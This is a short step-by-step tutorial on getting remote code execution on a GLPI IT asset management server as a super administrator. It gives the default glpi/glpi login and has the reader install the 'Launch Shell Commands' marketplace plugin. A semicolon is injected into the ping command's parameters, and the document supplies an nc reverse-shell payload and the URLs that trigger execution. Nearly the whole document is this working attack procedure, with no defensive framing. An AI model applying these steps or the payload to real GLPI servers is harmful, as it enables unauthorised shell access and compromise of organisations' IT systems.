How to RCE as a glpi administrator
Gestionnaire Libre de Parc Informatique (GLPI) is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing.
https://github.com/glpi-project/glpi
You need to be super administrator of glpi to add the plugin and perform the rce.
The default login is glpi / glpi
The technique consists in using a plugin which allows to execute commands on the system like ping or tracert and to divert it towards the reverse shell for example.
Initially you must add a key "GLPI network" in the general parameters of glpi what gives the rights to add extensions, you have just to create an account for free on the site of glpi and to copy paste the key.
in the Marketplace : /glpi/front/marketplace.php
Add the plugin named "Launch Shell Commands"
Edit the ping command page : /glpi/marketplace/shellcommands/front/shellcommand.form.php?id=1
Enter a random string in the tag and in the parameters you can run anything as a command using a semicolon
You can use this payload for reverse shell :
;nc -c /bin/bash localhost 1234
It is simply an "exec" of all the arguments there are no filters
We control the variable $commandToExec
Add a ping command group : /glpi/marketplace/shellcommands/front/commandgroup.php
To finish to execute the payload: /glpi/marketplace/shellcommands/front/advanced_execution.php
Select the ping command group, a category and a device from the list (if you don't have one you can create one in Assets)